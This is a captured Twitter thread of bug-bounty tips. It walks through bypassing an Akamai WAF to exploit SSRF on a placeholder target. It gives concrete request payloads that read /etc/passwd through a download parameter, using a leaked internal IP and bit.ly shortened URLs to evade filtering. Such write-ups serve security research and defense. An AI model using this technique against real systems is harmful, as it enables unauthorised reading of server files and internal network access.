Thread Reader

Basavaraj Banakar🇮🇳

@basu_banakar

Sep 23

7 tweets
Twitter

Akamai WAF Bypass read internal files via SSRF 1. target[.]com/download?url=file:///etc/passwd (Blocked by akamai waf) #bugbountytips #bugbounty #ssrf #wafbypass #hacking

2. target[.]com disclosing internal ip in the response header ex: X-Server: 10.136.166.91

3. Now target[.]com/download?url=http://10.136.166.91 (weird 403)

4. Used URL Shortener bitly and shortened http://10.136.166.91 (Example: bit[.]ly/blahblah)

5. Now target[.]com/download?url=bit[.]ly/blahblah I got successful response i.e with html content which is same as target[.]com

6. Now used http://10.136.166.91/download?url=file:///etc/passwd and shortened it ex: bit[.]ly/2ndblah (Because here frontend and backend both have same source code)

7. Here comes hackermode on😈 target[.]com/download?url=http://bit[.]ly/2ndblah and successfully got etc/passwd content

Basavaraj Banakar🇮🇳

@basu_banakar

n00b | ಕನ್ನಡಿಗ❤️

Follow on Twitter

Missing some tweets in this thread? Or failed to load images or videos? You can try to .